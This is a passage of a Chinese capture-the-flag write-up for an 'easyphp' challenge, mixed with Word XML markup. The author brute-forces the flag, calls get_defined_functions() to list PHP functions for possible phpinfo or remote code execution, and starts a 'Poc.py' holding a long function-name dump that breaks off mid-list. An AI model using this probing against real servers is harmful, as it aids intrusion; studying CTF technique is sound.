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18 easyphp :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开始是真的没有什么思路，以为要rce，但是并不用，最后居然爆破出来了，，，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看看源码，没有什么太多的信息，看了文档也没有什么用，直接爆破走一波，然后就得到了flag，感觉怪怪的，原理赛后慢慢想一下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2211070"/>
            <wp:effectExtent l="0" t="0" r="5080" b="139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可能要用某个函数进行处理就可以打印phpinfo或者rce，直接先爆破一波看看有哪些可以用的函数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print_r(get_defined_functions());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//得到所有的函数，通过python处理一下变成字典，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Poc.py（得到函数字典）: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s="""[0] =&gt; zend_version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[1] =&gt; func_num_args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[2] =&gt; func_get_arg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[3] =&gt; func_get_args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[4] =&gt; strlen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[5] =&gt; strcmp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[6] =&gt; strncmp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[7] =&gt; strcasecmp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[8] =&gt; strncasecmp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[9] =&gt; each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[10] =&gt; error_reporting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[11] =&gt; define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[12] =&gt; defined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[13] =&gt; get_class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[14] =&gt; get_called_class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[15] =&gt; get_parent_class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[16] =&gt; method_exists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[17] =&gt; property_exists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[18] =&gt; class_exists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[19] =&gt; interface_exists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[20] =&gt; trait_exists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[21] =&gt; function_exists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[22] =&gt; class_alias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[23] =&gt; get_included_files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[24] =&gt; get_required_files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[25] =&gt; is_subclass_of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[26] =&gt; is_a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[27] =&gt; get_class_vars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[28] =&gt; get_object_vars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[29] =&gt; get_class_methods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[30] =&gt; trigger_error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[31] =&gt; user_error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[32] =&gt; set_error_handler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[33] =&gt; restore_error_handler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[34] =&gt; set_exception_handler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[35] =&gt; restore_exception_handler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[36] =&gt; get_declared_classes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[37] =&gt; get_declared_traits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[38] =&gt; get_declared_interfaces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[39] =&gt; get_defined_functions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[40] =&gt; get_defined_vars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[41] =&gt; create_function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[42] =&gt; get_resource_type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[43] =&gt; get_resources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[44] =&gt; get_loaded_extensions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[45] =&gt; extension_loaded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[46] =&gt; get_extension_funcs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[47] =&gt; get_defined_constants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[48] =&gt; debug_backtrace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[49] =&gt; debug_print_backtrace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[50] =&gt; gc_mem_caches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[51] =&gt; gc_collect_cycles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[52] =&gt; gc_enabled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[53] =&gt; gc_enable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[54] =&gt; gc_disable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[55] =&gt; strtotime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[56] =&gt;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[57] =&gt; idate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[58] =&gt; gmdate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[59] =&gt; mktime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[60] =&gt; gmmktime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[61] =&gt; checkdate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[62] =&gt; strftime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[63] =&gt; gmstrftime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[64] =&gt;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[65] =&gt; localtime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[66] =&gt; getdate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[67] =&gt; date_create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[68] =&gt; date_create_immutable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[69] =&gt; date_create_from_format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[70] =&gt; date_create_immutable_from_format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[71] =&gt; date_parse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[72] =&gt; date_parse_from_format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[73] =&gt; date_get_last_errors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[74] =&gt; date_format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[75] =&gt; date_modify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[76] =&gt; date_add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[77] =&gt; date_sub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[78] =&gt; date_timezone_get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[79] =&gt; date_timezone_set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[80] =&gt; date_offset_get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[81] =&gt; date_diff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[82] =&gt; date_time_set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[83] =&gt; date_date_set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[84] =&gt; date_isodate_set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[85] =&gt; date_timestamp_set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[86] =&gt; date_timestamp_get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[87] =&gt; timezone_open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[88] =&gt; timezone_name_get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[89] =&gt; timezone_name_from_abbr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[90] =&gt; timezone_offset_get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[91] =&gt; timezone_transitions_get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[92] =&gt; timezone_location_get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[93] =&gt; timezone_identifiers_list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[94] =&gt; timezone_abbreviations_list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[95] =&gt; timezone_version_get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[96] =&gt; date_interval_create_from_date_string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[97] =&gt; date_interval_format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[98] =&gt; date_default_timezone_set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[99] =&gt; date_default_timezone_get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[100] =&gt; date_sunrise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[101] =&gt; date_sunset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[102] =&gt; date_sun_info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[103] =&gt; libxml_set_streams_context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[104] =&gt; libxml_use_internal_errors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[105] =&gt; libxml_get_last_error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[106] =&gt; libxml_clear_errors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[107] =&gt; libxml_get_errors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[108] =&gt; libxml_disable_entity_loader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[109] =&gt; libxml_set_external_entity_loader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[110] =&gt; openssl_get_cert_locations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[111] =&gt; openssl_spki_new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[112] =&gt; openssl_spki_verify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[113] =&gt; openssl_spki_export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[114] =&gt; openssl_spki_export_challenge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[115] =&gt; openssl_pkey_free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[116] =&gt; openssl_pkey_new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[117] =&gt; openssl_pkey_export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[118] =&gt; openssl_pkey_export_to_file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[119] =&gt; openssl_pkey_get_private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[120] =&gt; openssl_pkey_get_public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[121] =&gt; openssl_pkey_get_details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[122] =&gt; openssl_free_key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[123] =&gt; openssl_get_privatekey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[124] =&gt; openssl_get_publickey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[125] =&gt; openssl_x509_read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[126] =&gt; openssl_x509_free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[127] =&gt; openssl_x509_parse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[128] =&gt; openssl_x509_checkpurpose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[129] =&gt; openssl_x509_check_private_key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[130] =&gt; openssl_x509_export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[131] =&gt; openssl_x509_fingerprint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[132] =&gt; openssl_x509_export_to_file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[133] =&gt; openssl_pkcs12_export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[134] =&gt; openssl_pkcs12_export_to_file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[135] =&gt; openssl_pkcs12_read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[136] =&gt; openssl_csr_new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[137] =&gt; openssl_csr_export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[138] =&gt; openssl_csr_export_to_file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[139] =&gt; openssl_csr_sign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[140] =&gt; openssl_csr_get_subject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[141] =&gt; openssl_csr_get_public_key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[142] =&gt; openssl_digest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[143] =&gt; openssl_encrypt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[144] =&gt; openssl_decrypt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[145] =&gt; openssl_cipher_iv_length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[146] =&gt; openssl_sign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[147] =&gt; openssl_verify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[148] =&gt; openssl_seal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[149] =&gt; openssl_open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[150] =&gt; openssl_pbkdf2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[151] =&gt; openssl_pkcs7_verify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[152] =&gt; openssl_pkcs7_decrypt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[153] =&gt; openssl_pkcs7_sign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[154] =&gt; openssl_pkcs7_encrypt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[155] =&gt; openssl_private_encrypt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[156] =&gt; openssl_private_decrypt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[157] =&gt; openssl_public_encrypt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[158] =&gt; openssl_public_decrypt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[159] =&gt; openssl_get_md_methods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[160] =&gt; openssl_get_cipher_methods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[161] =&gt; openssl_dh_compute_key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[162] =&gt; openssl_random_pseudo_bytes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[163] =&gt; openssl_error_string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[164] =&gt; preg_match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[165] =&gt; preg_match_all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[166] =&gt; preg_replace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[167] =&gt; preg_replace_callback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[168] =&gt; preg_replace_callback_array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[169] =&gt; preg_filter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[170] =&gt; preg_split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[171] =&gt; preg_quote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[172] =&gt; preg_grep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[173] =&gt; preg_last_error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[174] =&gt; readgzfile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[175] =&gt; gzrewind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[176] =&gt; gzclose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[177] =&gt; gzeof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[178] =&gt; gzgetc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[179] =&gt; gzgets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[180] =&gt; gzgetss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[181] =&gt; gzread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[182] =&gt; gzopen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[183] =&gt; gzpassthru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[184] =&gt; gzseek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[185] =&gt; gztell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[186] =&gt; gzwrite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[187] =&gt; gzputs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[188] =&gt; gzfile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[189] =&gt; gzcompress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[190] =&gt; gzuncompress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[191] =&gt; gzdeflate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[192] =&gt; gzinflate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[193] =&gt; gzencode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[194] =&gt; gzdecode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[195] =&gt; zlib_encode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[196] =&gt; zlib_decode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[197] =&gt; zlib_get_coding_type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[198] =&gt; deflate_init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[199] =&gt; deflate_add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[200] =&gt; inflate_init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[201] =&gt; inflate_add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[202] =&gt; ob_gzhandler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[203] =&gt; bcadd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[204] =&gt; bcsub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[205] =&gt; bcmul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[206] =&gt; bcdiv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[207] =&gt; bcmod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[208] =&gt; bcpow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[209] =&gt; bcsqrt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[210] =&gt; bcscale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[211] =&gt; bccomp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[212] =&gt; bcpowmod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[213] =&gt; bzopen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[214] =&gt; bzread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[215] =&gt; bzwrite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[216] =&gt; bzflush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[217] =&gt; bzclose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[218] =&gt; bzerrno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[219] =&gt; bzerrstr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[220] =&gt; bzerror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[221] =&gt; bzcompress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[222] =&gt; bzdecompress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[223] =&gt; jdtogregorian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[224] =&gt; gregoriantojd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[225] =&gt; jdtojulian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[226] =&gt; juliantojd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[227] =&gt; jdtojewish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[228] =&gt; jewishtojd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[229] =&gt; jdtofrench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[230] =&gt; frenchtojd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[231] =&gt; jddayofweek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[232] =&gt; jdmonthname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[233] =&gt; easter_date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[234] =&gt; easter_days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[235] =&gt; unixtojd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[236] =&gt; jdtounix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[237] =&gt; cal_to_jd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[238] =&gt; cal_from_jd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[239] =&gt; cal_days_in_month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[240] =&gt; cal_info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[241] =&gt; ctype_alnum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[242] =&gt; ctype_alpha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[243] =&gt; ctype_cntrl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[244] =&gt; ctype_digit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[245] =&gt; ctype_lower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[246] =&gt; ctype_graph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[247] =&gt; ctype_print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[248] =&gt; ctype_punct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[249] =&gt; ctype_space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[250] =&gt; ctype_upper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[251] =&gt; ctype_xdigit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[252] =&gt; curl_init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[253] =&gt; curl_copy_handle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[254] =&gt; curl_version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[255] =&gt; curl_setopt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[256] =&gt; curl_setopt_array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[257] =&gt; curl_exec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[258] =&gt; curl_getinfo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[259] =&gt; curl_error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[260] =&gt; curl_errno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[261] =&gt; curl_close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[262] =&gt; curl_strerror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[263] =&gt; curl_multi_strerror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[264] =&gt; curl_reset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[265] =&gt; curl_escape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[266] =&gt; curl_unescape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[267] =&gt; curl_pause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[268] =&gt; curl_multi_init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[269] =&gt; curl_multi_add_handle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[270] =&gt; curl_multi_remove_handle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[271] =&gt; curl_multi_select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[272] =&gt; curl_multi_exec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[273] =&gt; curl_multi_getcontent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[274] =&gt; curl_multi_info_read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[275] =&gt; curl_multi_close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[276] =&gt; curl_multi_setopt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[277] =&gt; curl_share_init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[278] =&gt; curl_share_close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[279] =&gt; curl_share_setopt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[280] =&gt; curl_file_create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[281] =&gt; dom_import_simplexml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[282] =&gt; exif_read_data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[283] =&gt; read_exif_data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[284] =&gt; exif_tagname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[285] =&gt; exif_thumbnail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[286] =&gt; exif_imagetype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[287] =&gt; finfo_open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[288] =&gt; finfo_close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[289] =&gt; finfo_set_flags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[290] =&gt; finfo_file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[291] =&gt; finfo_buffer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[292] =&gt; mime_content_type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[293] =&gt; filter_input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[294] =&gt; filter_var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[295] =&gt; filter_input_array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[296] =&gt; filter_var_array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[297] =&gt; filter_list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[298] =&gt; filter_has_var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[299] =&gt; filter_id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[300] =&gt; ftp_connect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[301] =&gt; ftp_ssl_connect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[302] =&gt; ftp_login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[303] =&gt; ftp_pwd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[304] =&gt; ftp_cdup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[305] =&gt; ftp_chdir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[306] =&gt; ftp_exec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[307] =&gt; ftp_raw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[308] =&gt; ftp_mkdir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[309] =&gt; ftp_rmdir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[310] =&gt; ftp_chmod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[311] =&gt; ftp_alloc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[312] =&gt; ftp_nlist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[313] =&gt; ftp_rawlist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[314] =&gt; ftp_systype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[315] =&gt; ftp_pasv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[316] =&gt; ftp_get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[317] =&gt; ftp_fget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[318] =&gt; ftp_put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[319] =&gt; ftp_fput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[320] =&gt; ftp_size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[321] =&gt; ftp_mdtm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[322] =&gt; ftp_rename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[323] =&gt; ftp_delete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[324] =&gt; ftp_site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[325] =&gt; ftp_close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[326] =&gt; ftp_set_option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[327] =&gt; ftp_get_option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[328] =&gt; ftp_nb_fget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[329] =&gt; ftp_nb_get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[330] =&gt; ftp_nb_continue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[331] =&gt; ftp_nb_put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[332] =&gt; ftp_nb_fput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[333] =&gt; ftp_quit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[334] =&gt; gd_info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[335] =&gt; imagearc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[336] =&gt; imageellipse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[337] =&gt; imagechar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[338] =&gt; imagecharup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[339] =&gt; imagecolorat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[340] =&gt; imagecolorallocate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[341] =&gt; imagepalettecopy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[342] =&gt; imagecreatefromstring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[343] =&gt; imagecolorclosest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[344] =&gt; imagecolorclosesthwb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[345] =&gt; imagecolordeallocate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[346] =&gt; imagecolorresolve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[347] =&gt; imagecolorexact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[348] =&gt; imagecolorset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[349] =&gt; imagecolortransparent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[350] =&gt; imagecolorstotal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[351] =&gt; imagecolorsforindex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[352] =&gt; imagecopy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[353] =&gt; imagecopymerge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[354] =&gt; imagecopymergegray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[355] =&gt; imagecopyresized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[356] =&gt; imagecreate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[357] =&gt; imagecreatetruecolor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[358] =&gt; imageistruecolor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[359] =&gt; imagetruecolortopalette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[360] =&gt; imagepalettetotruecolor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[361] =&gt; imagesetthickness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[362] =&gt; imagefilledarc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[363] =&gt; imagefilledellipse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[364] =&gt; imagealphablending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[365] =&gt; imagesavealpha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[366] =&gt; imagecolorallocatealpha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[367] =&gt; imagecolorresolvealpha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[368] =&gt; imagecolorclosestalpha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[369] =&gt; imagecolorexactalpha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[370] =&gt; imagecopyresampled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[371] =&gt; imagerotate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[372] =&gt; imageflip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[373] =&gt; imageantialias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[374] =&gt; imagecrop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[375] =&gt; imagecropauto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[376] =&gt; imagescale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[377] =&gt; imageaffine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[378] =&gt; imageaffinematrixconcat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[379] =&gt; imageaffinematrixget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[380] =&gt; imagesetinterpolation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[381] =&gt; imagesettile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[382] =&gt; imagesetbrush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[383] =&gt; imagesetstyle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[384] =&gt; imagecreatefrompng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[385] =&gt; imagecreatefromgif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[386] =&gt; imagecreatefromjpeg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[387] =&gt; imagecreatefromwbmp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[388] =&gt; imagecreatefromxbm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[389] =&gt; imagecreatefromxpm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[390] =&gt; imagecreatefromgd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[391] =&gt; imagecreatefromgd2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[392] =&gt; imagecreatefromgd2part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[393] =&gt; imagepng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[394] =&gt; imagegif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[395] =&gt; imagejpeg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[396] =&gt; imagewbmp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[397] =&gt; imagegd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[398] =&gt; imagegd2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[399] =&gt; imagedestroy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[400] =&gt; imagegammacorrect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[401] =&gt; imagefill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[402] =&gt; imagefilledpolygon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[403] =&gt; imagefilledrectangle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[404] =&gt; imagefilltoborder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[405] =&gt; imagefontwidth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[406] =&gt; imagefontheight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[407] =&gt; imageinterlace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[408] =&gt; imageline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[409] =&gt; imageloadfont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[410] =&gt; imagepolygon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[411] =&gt; imagerectangle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[412] =&gt; imagesetpixel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[413] =&gt; imagestring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[414] =&gt; imagestringup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[415] =&gt; imagesx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[416] =&gt; imagesy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[417] =&gt; imagedashedline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[418] =&gt; imagettfbbox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[419] =&gt; imagettftext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[420] =&gt; imageftbbox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[421] =&gt; imagefttext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[422] =&gt; imagetypes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[423] =&gt; jpeg2wbmp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[424] =&gt; png2wbmp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[425] =&gt; image2wbmp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[426] =&gt; imagelayereffect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[427] =&gt; imagexbm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[428] =&gt; imagecolormatch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[429] =&gt; imagefilter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[430] =&gt; imageconvolution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[431] =&gt; textdomain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[432] =&gt; gettext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[433] =&gt; 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[434] =&gt; dgettext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[435] =&gt; dcgettext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[436] =&gt; bindtextdomain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[437] =&gt; ngettext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[438] =&gt; dngettext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[439] =&gt; dcngettext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[440] =&gt; bind_textdomain_codeset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[441] =&gt; gmp_init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[442] =&gt; gmp_import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[443] =&gt; gmp_export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[444] =&gt; gmp_intval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[445] =&gt; gmp_strval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[446] =&gt; gmp_add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[447] =&gt; gmp_sub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[448] =&gt; gmp_mul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[449] =&gt; gmp_div_qr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[450] =&gt; gmp_div_q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[451] =&gt; gmp_div_r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[452] =&gt; gmp_div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[453] =&gt; gmp_mod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[454] =&gt; gmp_divexact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[455] =&gt; gmp_neg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[456] =&gt; gmp_abs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[457] =&gt; gmp_fact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[458] =&gt; gmp_sqrt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[459] =&gt; gmp_sqrtrem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[460] =&gt; gmp_root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[461] =&gt; gmp_rootrem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[462] =&gt; gmp_pow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[463] =&gt; gmp_powm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[464] =&gt; gmp_perfect_square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[465] =&gt; gmp_prob_prime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[466] =&gt; gmp_gcd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[467] =&gt; gmp_gcdext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[468] =&gt; gmp_invert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[469] =&gt; gmp_jacobi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[470] =&gt; gmp_legendre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[471] =&gt; gmp_cmp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[472] =&gt; gmp_sign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[473] =&gt; gmp_random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[474] =&gt; gmp_random_seed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[475] =&gt; gmp_random_bits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[476] =&gt; gmp_random_range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[477] =&gt; gmp_and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[478] =&gt; gmp_or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[479] =&gt; gmp_com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[480] =&gt; gmp_xor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[481] =&gt; gmp_setbit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[482] =&gt; gmp_clrbit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[483] =&gt; gmp_testbit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[484] =&gt; gmp_scan0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[485] =&gt; gmp_scan1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[486] =&gt; gmp_popcount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[487] =&gt; gmp_hamdist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[488] =&gt; gmp_nextprime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[489] =&gt; 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[490] =&gt; hash_file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[491] =&gt; hash_hmac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[492] =&gt; hash_hmac_file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[493] =&gt; hash_init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[494] =&gt; hash_update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[495] =&gt; hash_update_stream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[496] =&gt; hash_update_file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[497] =&gt; hash_final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[498] =&gt; hash_copy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[499] =&gt; hash_algos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[500] =&gt; hash_pbkdf2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[501] =&gt; hash_equals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[502] =&gt; iconv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[503] =&gt; iconv_get_encoding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[504] =&gt; iconv_set_encoding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[505] =&gt; iconv_strlen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[506] =&gt; iconv_substr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[507] =&gt; iconv_strpos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[508] =&gt; iconv_strrpos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[509] =&gt; iconv_mime_encode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[510] =&gt; iconv_mime_decode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[511] =&gt; iconv_mime_decode_headers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[512] =&gt; collator_create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[513] =&gt; collator_compare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[514] =&gt; collator_get_attribute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[515] =&gt; collator_set_attribute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[516] =&gt; collator_get_strength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[517] =&gt; collator_set_strength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[518] =&gt; collator_sort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[519] =&gt; collator_sort_with_sort_keys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[520] =&gt; collator_asort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[521] =&gt; collator_get_locale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[522] =&gt; collator_get_error_code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[523] =&gt; collator_get_error_message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[524] =&gt; collator_get_sort_key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[525] =&gt; numfmt_create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[526] =&gt; numfmt_format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[527] =&gt; numfmt_parse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[528] =&gt; numfmt_format_currency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[529] =&gt; numfmt_parse_currency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[530] =&gt; numfmt_set_attribute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[531] =&gt; numfmt_get_attribute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[532] =&gt; numfmt_set_text_attribute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[533] =&gt; numfmt_get_text_attribute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[534] =&gt; numfmt_set_symbol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[535] =&gt; numfmt_get_symbol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[536] =&gt; numfmt_set_pattern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[537] =&gt; numfmt_get_pattern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[538] =&gt; numfmt_get_locale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[539] =&gt; numfmt_get_error_code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[540] =&gt; numfmt_get_error_message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[541] =&gt; normalizer_normalize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[542] =&gt; normalizer_is_normalized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[543] =&gt; locale_get_default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[544] =&gt; locale_set_default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[545] =&gt; locale_get_primary_language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[546] =&gt; locale_get_script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[547] =&gt; locale_get_region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[548] =&gt; locale_get_keywords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[549] =&gt; locale_get_display_script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[550] =&gt; locale_get_display_region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[551] =&gt; locale_get_display_name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[552] =&gt; locale_get_display_language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[553] =&gt; locale_get_display_variant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[554] =&gt; locale_compose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[555] =&gt; locale_parse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[556] =&gt; locale_get_all_variants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[557] =&gt; locale_filter_matches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[558] =&gt; locale_canonicalize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[559] =&gt; locale_lookup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[560] =&gt; locale_accept_from_http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[561] =&gt; msgfmt_create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[562] =&gt; msgfmt_format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[563] =&gt; msgfmt_format_message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[564] =&gt; msgfmt_parse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[565] =&gt; msgfmt_parse_message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[566] =&gt; msgfmt_set_pattern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[567] =&gt; msgfmt_get_pattern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[568] =&gt; msgfmt_get_locale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[569] =&gt; msgfmt_get_error_code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[570] =&gt; msgfmt_get_error_message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[571] =&gt; datefmt_create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[572] =&gt; datefmt_get_datetype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[573] =&gt; datefmt_get_timetype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[574] =&gt; datefmt_get_calendar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[575] =&gt; datefmt_get_calendar_object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[576] =&gt; datefmt_set_calendar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[577] =&gt; datefmt_get_locale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[578] =&gt; datefmt_get_timezone_id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[579] =&gt; datefmt_get_timezone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[580] =&gt; datefmt_set_timezone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[581] =&gt; datefmt_get_pattern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[582] =&gt; datefmt_set_pattern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[583] =&gt; datefmt_is_lenient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[584] =&gt; datefmt_set_lenient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[585] =&gt; datefmt_format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[586] =&gt; datefmt_format_object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[587] =&gt; datefmt_parse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[588] =&gt; datefmt_localtime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[589] =&gt; datefmt_get_error_code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[590] =&gt; datefmt_get_error_message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[591] =&gt; grapheme_strlen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[592] =&gt; grapheme_strpos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[593] =&gt; grapheme_stripos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[594] =&gt; grapheme_strrpos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[595] =&gt; grapheme_strripos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[596] =&gt; grapheme_substr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[597] =&gt; grapheme_strstr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[598] =&gt; grapheme_stristr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[599] =&gt; grapheme_extract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[600] =&gt; idn_to_ascii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[601] =&gt; idn_to_utf8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[602] =&gt; resourcebundle_create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[603] =&gt; resourcebundle_get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[604] =&gt; resourcebundle_count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[605] =&gt; resourcebundle_locales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[606] =&gt; resourcebundle_get_error_code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[607] =&gt; resourcebundle_get_error_message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[608] =&gt; transliterator_create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[609] =&gt; transliterator_create_from_rules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[610] =&gt; transliterator_list_ids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[611] =&gt; transliterator_create_inverse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[612] =&gt; transliterator_transliterate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[613] =&gt; transliterator_get_error_code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[614] =&gt; transliterator_get_error_message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[615] =&gt; intltz_create_time_zone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[616] =&gt; intltz_from_date_time_zone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[617] =&gt; intltz_create_default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[618] =&gt; intltz_get_id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[619] =&gt; intltz_get_gmt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[620] =&gt; intltz_get_unknown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[621] =&gt; intltz_create_enumeration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[622] =&gt; intltz_count_equivalent_ids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[623] =&gt; intltz_create_time_zone_id_enumeration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[624] =&gt; intltz_get_canonical_id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[625] =&gt; intltz_get_region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[626] =&gt; intltz_get_tz_data_version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[627] =&gt; intltz_get_equivalent_id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[628] =&gt; intltz_use_daylight_time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[629] =&gt; intltz_get_offset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[630] =&gt; intltz_get_raw_offset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[631] =&gt; intltz_has_same_rules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[632] =&gt; intltz_get_display_name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[633] =&gt; intltz_get_dst_savings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[634] =&gt; intltz_to_date_time_zone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[635] =&gt; intltz_get_error_code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[636] =&gt; intltz_get_error_message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[637] =&gt; intlcal_create_instance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[638] =&gt; intlcal_get_keyword_values_for_locale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[639] =&gt; intlcal_get_now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[640] =&gt; intlcal_get_available_locales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[641] =&gt; intlcal_get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[642] =&gt; intlcal_get_time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[643] =&gt; intlcal_set_time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[644] =&gt; intlcal_add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[645] =&gt; intlcal_set_time_zone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[646] =&gt; intlcal_after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[647] =&gt; intlcal_before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[648] =&gt; intlcal_set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[649] =&gt; intlcal_roll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[650] =&gt; intlcal_clear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[651] =&gt; intlcal_field_difference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[652] =&gt; intlcal_get_actual_maximum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[653] =&gt; intlcal_get_actual_minimum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[654] =&gt; intlcal_get_day_of_week_type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[655] =&gt; intlcal_get_first_day_of_week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[656] =&gt; intlcal_get_greatest_minimum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[657] =&gt; intlcal_get_least_maximum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[658] =&gt; intlcal_get_locale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[659] =&gt; intlcal_get_maximum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[660] =&gt; intlcal_get_minimal_days_in_first_week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[661] =&gt; intlcal_get_minimum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[662] =&gt; intlcal_get_time_zone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[663] =&gt; intlcal_get_type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[664] =&gt; intlcal_get_weekend_transition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[665] =&gt; intlcal_in_daylight_time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[666] =&gt; intlcal_is_equivalent_to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[667] =&gt; intlcal_is_lenient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[668] =&gt; intlcal_is_set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[669] =&gt; intlcal_is_weekend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[670] =&gt; intlcal_set_first_day_of_week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[671] =&gt; intlcal_set_lenient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[672] =&gt; intlcal_set_minimal_days_in_first_week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[673] =&gt; intlcal_equals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[674] =&gt; intlcal_from_date_time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[675] =&gt; intlcal_to_date_time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[676] =&gt; intlcal_get_repeated_wall_time_option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[677] =&gt; intlcal_get_skipped_wall_time_option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[678] =&gt; intlcal_set_repeated_wall_time_option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[679] =&gt; intlcal_set_skipped_wall_time_option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[680] =&gt; intlcal_get_error_code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[681] =&gt; intlcal_get_error_message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[682] =&gt; intlgregcal_create_instance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[683] =&gt; intlgregcal_set_gregorian_change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[684] =&gt; intlgregcal_get_gregorian_change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[685] =&gt; intlgregcal_is_leap_year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[686] =&gt; intl_get_error_code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[687] =&gt; intl_get_error_message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[688] =&gt; intl_is_failure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[689] =&gt; intl_error_name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[690] =&gt; json_encode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[691] =&gt; json_decode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[692] =&gt; json_last_error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[693] =&gt; json_last_error_msg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[694] =&gt; mb_convert_case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[695] =&gt; mb_strtoupper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[696] =&gt; mb_strtolower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[697] =&gt; mb_language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[698] =&gt; mb_internal_encoding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[699] =&gt; mb_http_input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[700] =&gt; mb_http_output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[701] =&gt; mb_detect_order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[702] =&gt; mb_substitute_character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[703] =&gt; mb_parse_str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[704] =&gt; mb_output_handler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[705] =&gt; mb_preferred_mime_name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[706] =&gt; mb_strlen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[707] =&gt; mb_strpos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[708] =&gt; mb_strrpos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[709] =&gt; mb_stripos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[710] =&gt; mb_strripos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[711] =&gt; mb_strstr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[712] =&gt; mb_strrchr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[713] =&gt; mb_stristr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[714] =&gt; mb_strrichr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[715] =&gt; mb_substr_count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[716] =&gt; mb_substr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[717] =&gt; mb_strcut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[718] =&gt; mb_strwidth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[719] =&gt; mb_strimwidth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[720] =&gt; mb_convert_encoding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[721] =&gt; mb_detect_encoding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[722] =&gt; mb_list_encodings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[723] =&gt; mb_encoding_aliases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[724] =&gt; mb_convert_kana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[725] =&gt; mb_encode_mimeheader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[726] =&gt; mb_decode_mimeheader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[727] =&gt; mb_convert_variables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[728] =&gt; mb_encode_numericentity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[729] =&gt; mb_decode_numericentity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[730] =&gt; mb_send_mail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[731] =&gt; mb_get_info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[732] =&gt; mb_check_encoding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[733] =&gt; mb_regex_encoding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[734] =&gt; mb_regex_set_options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[735] =&gt; mb_ereg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[736] =&gt; mb_eregi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[737] =&gt; mb_ereg_replace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[738] =&gt; mb_eregi_replace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[739] =&gt; mb_ereg_replace_callback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[740] =&gt; mb_split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[741] =&gt; mb_ereg_match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[742] =&gt; mb_ereg_search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[743] =&gt; mb_ereg_search_pos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[744] =&gt; mb_ereg_search_regs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[745] =&gt; mb_ereg_search_init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[746] =&gt; mb_ereg_search_getregs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[747] =&gt; mb_ereg_search_getpos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[748] =&gt; mb_ereg_search_setpos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[749] =&gt; mbregex_encoding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[750] =&gt; mbereg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[751] =&gt; mberegi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[752] =&gt; mbereg_replace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[753] =&gt; mberegi_replace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[754] =&gt; mbsplit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[755] =&gt; mbereg_match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[756] =&gt; mbereg_search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[757] =&gt; mbereg_search_pos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[758] =&gt; mbereg_search_regs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[759] =&gt; mbereg_search_init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[760] =&gt; mbereg_search_getregs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[761] =&gt; mbereg_search_getpos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[762] =&gt; mbereg_search_setpos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[763] =&gt; mcrypt_get_key_size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[764] =&gt; mcrypt_get_block_size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[765] =&gt; mcrypt_get_cipher_name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[766] =&gt; mcrypt_create_iv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[767] =&gt; mcrypt_list_algorithms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[768] =&gt; mcrypt_list_modes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[769] =&gt; mcrypt_get_iv_size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[770] =&gt; mcrypt_encrypt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[771] =&gt; mcrypt_decrypt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[772] =&gt; mcrypt_module_open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[773] =&gt; mcrypt_generic_init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[774] =&gt; mcrypt_generic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[775] =&gt; mdecrypt_generic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[776] =&gt; mcrypt_generic_deinit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[777] =&gt; mcrypt_enc_self_test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[778] =&gt; mcrypt_enc_is_block_algorithm_mode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[779] =&gt; mcrypt_enc_is_block_algorithm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[780] =&gt; mcrypt_enc_is_block_mode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[781] =&gt; mcrypt_enc_get_block_size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[782] =&gt; mcrypt_enc_get_key_size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[783] =&gt; mcrypt_enc_get_supported_key_sizes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[784] =&gt; mcrypt_enc_get_iv_size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[785] =&gt; mcrypt_enc_get_algorithms_name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[786] =&gt; mcrypt_enc_get_modes_name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[787] =&gt; mcrypt_module_self_test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[788] =&gt; mcrypt_module_is_block_algorithm_mode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[789] =&gt; mcrypt_module_is_block_algorithm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[790] =&gt; mcrypt_module_is_block_mode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[791] =&gt; mcrypt_module_get_algo_block_size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[792] =&gt; mcrypt_module_get_algo_key_size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[793] =&gt; mcrypt_module_get_supported_key_sizes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[794] =&gt; mcrypt_module_close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[795] =&gt; mysqli_affected_rows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[796] =&gt; mysqli_autocommit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[797] =&gt; mysqli_begin_transaction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[798] =&gt; mysqli_change_user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[799] =&gt; mysqli_character_set_name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[800] =&gt; mysqli_close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[801] =&gt; mysqli_commit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[802] =&gt; mysqli_connect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[803] =&gt; mysqli_connect_errno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[804] =&gt; mysqli_connect_error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[805] =&gt; mysqli_data_seek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[806] =&gt; mysqli_dump_debug_info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[807] =&gt; mysqli_debug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[808] =&gt; mysqli_errno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[809] =&gt; mysqli_error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[810] =&gt; mysqli_error_list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[811] =&gt; mysqli_stmt_execute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[812] =&gt; mysqli_execute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[813] =&gt; mysqli_fetch_field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[814] =&gt; mysqli_fetch_fields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[815] =&gt; mysqli_fetch_field_direct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[816] =&gt; mysqli_fetch_lengths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[817] =&gt; mysqli_fetch_array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[818] =&gt; mysqli_fetch_assoc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[819] =&gt; mysqli_fetch_object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[820] =&gt; mysqli_fetch_row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[821] =&gt; mysqli_field_count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[822] =&gt; mysqli_field_seek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[823] =&gt; mysqli_field_tell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[824] =&gt; mysqli_free_result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[825] =&gt; mysqli_get_charset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[826] =&gt; mysqli_get_client_info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[827] =&gt; mysqli_get_client_version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[828] =&gt; mysqli_get_links_stats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[829] =&gt; mysqli_get_host_info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[830] =&gt; mysqli_get_proto_info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[831] =&gt; mysqli_get_server_info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[832] =&gt; mysqli_get_server_version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[833] =&gt; mysqli_get_warnings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[834] =&gt; mysqli_init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[835] =&gt; mysqli_info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[836] =&gt; mysqli_insert_id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[837] =&gt; mysqli_kill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[838] =&gt; mysqli_more_results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[839] =&gt; mysqli_multi_query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[840] =&gt; mysqli_next_result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[841] =&gt; mysqli_num_fields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[842] =&gt; mysqli_num_rows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[843] =&gt; mysqli_options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[844] =&gt; mysqli_ping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[845] =&gt; mysqli_prepare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[846] =&gt; mysqli_report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[847] =&gt; mysqli_query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[848] =&gt; mysqli_real_connect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[849] =&gt; mysqli_real_escape_string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[850] =&gt; mysqli_real_query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[851] =&gt; mysqli_release_savepoint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[852] =&gt; mysqli_rollback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[853] =&gt; mysqli_savepoint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[854] =&gt; mysqli_select_db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[855] =&gt; mysqli_set_charset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[856] =&gt; mysqli_stmt_affected_rows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[857] =&gt; mysqli_stmt_attr_get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[858] =&gt; mysqli_stmt_attr_set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[859] =&gt; mysqli_stmt_bind_param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[860] =&gt; mysqli_stmt_bind_result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[861] =&gt; mysqli_stmt_close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[862] =&gt; mysqli_stmt_data_seek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[863] =&gt; mysqli_stmt_errno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[864] =&gt; mysqli_stmt_error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[865] =&gt; mysqli_stmt_error_list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[866] =&gt; mysqli_stmt_fetch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[867] =&gt; 